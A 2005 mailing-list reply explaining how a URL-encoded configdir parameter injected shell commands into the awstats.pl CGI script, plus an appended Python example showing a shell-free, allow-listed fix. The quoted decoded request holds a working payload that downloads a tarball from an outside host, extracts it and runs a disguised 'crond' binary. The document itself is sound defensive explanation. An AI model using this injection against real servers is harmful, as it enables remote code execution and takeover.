> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
> > Replace the url-encoded characters and you get:
> > /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
> > So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
> I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
It is enough if the script does something as stupid as:
system("cat $configdir/somefile")
(Assuming the value of configdir is stored in the $configdir variable.)
What gets executed is:
cat |echo ; echo b_exp; [...]; echo e_exp;%00/somefile
The last part will produce an error, most likely, but who cares, the important part was already executed...
It is a classic example of command injection. Most exploits of that type are for SQL queries. This one is for the shell.
--
Aleksandar Milivojevic <amilivojevic@xxxxxx>
Pollard Banknote Limited
Systems Administrator
1499 Buffalo Place
Winnipeg, MB R3T 1L7
Tel: (204) 474-2323 ext 276
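To make the `system("cat $configdir/somefile")` pattern above concrete, here is an added example (not from the thread or from awstats) in Python: it shows the string a naive shell call would hand to sh, next to a version that validates the parameter against an allow-list, confines it to a base directory, and runs `cat` via list-form argv so no shell ever parses it. The `TAINTED` value is constructed for the example and carries only harmless echo commands; `SAFE_NAME` is an assumed naming rule for config directories.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Constructed for this example: a decoded configdir value shaped like the one
# in the thread, with only harmless echo commands after the pipe.
TAINTED = "|echo ;echo b_exp;cd /tmp;echo e_exp;\x00"

# Assumption: real config directory names only ever use these characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]+")


def vulnerable_command(configdir: str) -> str:
    """Return the string a naive system("cat $configdir/somefile") hands to sh.
    It is returned, not executed: the point is to see what the shell would parse."""
    return f"cat {configdir}/somefile"


def safe_read(configdir: str, base: Path) -> bytes:
    """Read <base>/<configdir>/somefile without ever involving a shell."""
    if not SAFE_NAME.fullmatch(configdir):
        raise ValueError("configdir contains characters outside the allow-list")
    target = (base / configdir / "somefile").resolve()
    if base.resolve() not in target.parents:
        raise ValueError("configdir escapes the base directory")
    # List-form argv: no shell, so metacharacters in the argument are just bytes.
    return subprocess.run(["cat", str(target)], capture_output=True, check=True).stdout


def demo() -> dict:
    """Exercise both paths against a throwaway directory and report what happened."""
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "good").mkdir()
        (base / "good" / "somefile").write_text("ok\n")
        results = {"good": safe_read("good", base)}
        for label, value in (("tainted", TAINTED), ("traversal", "..")):
            try:
                safe_read(value, base)
                results[label] = "accepted"
            except ValueError as exc:
                results[label] = str(exc)
    results["shell_sees"] = vulnerable_command(TAINTED)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Note that the allow-list alone is not enough: ".." passes the character check, which is why the resolved path is also compared against the base directory.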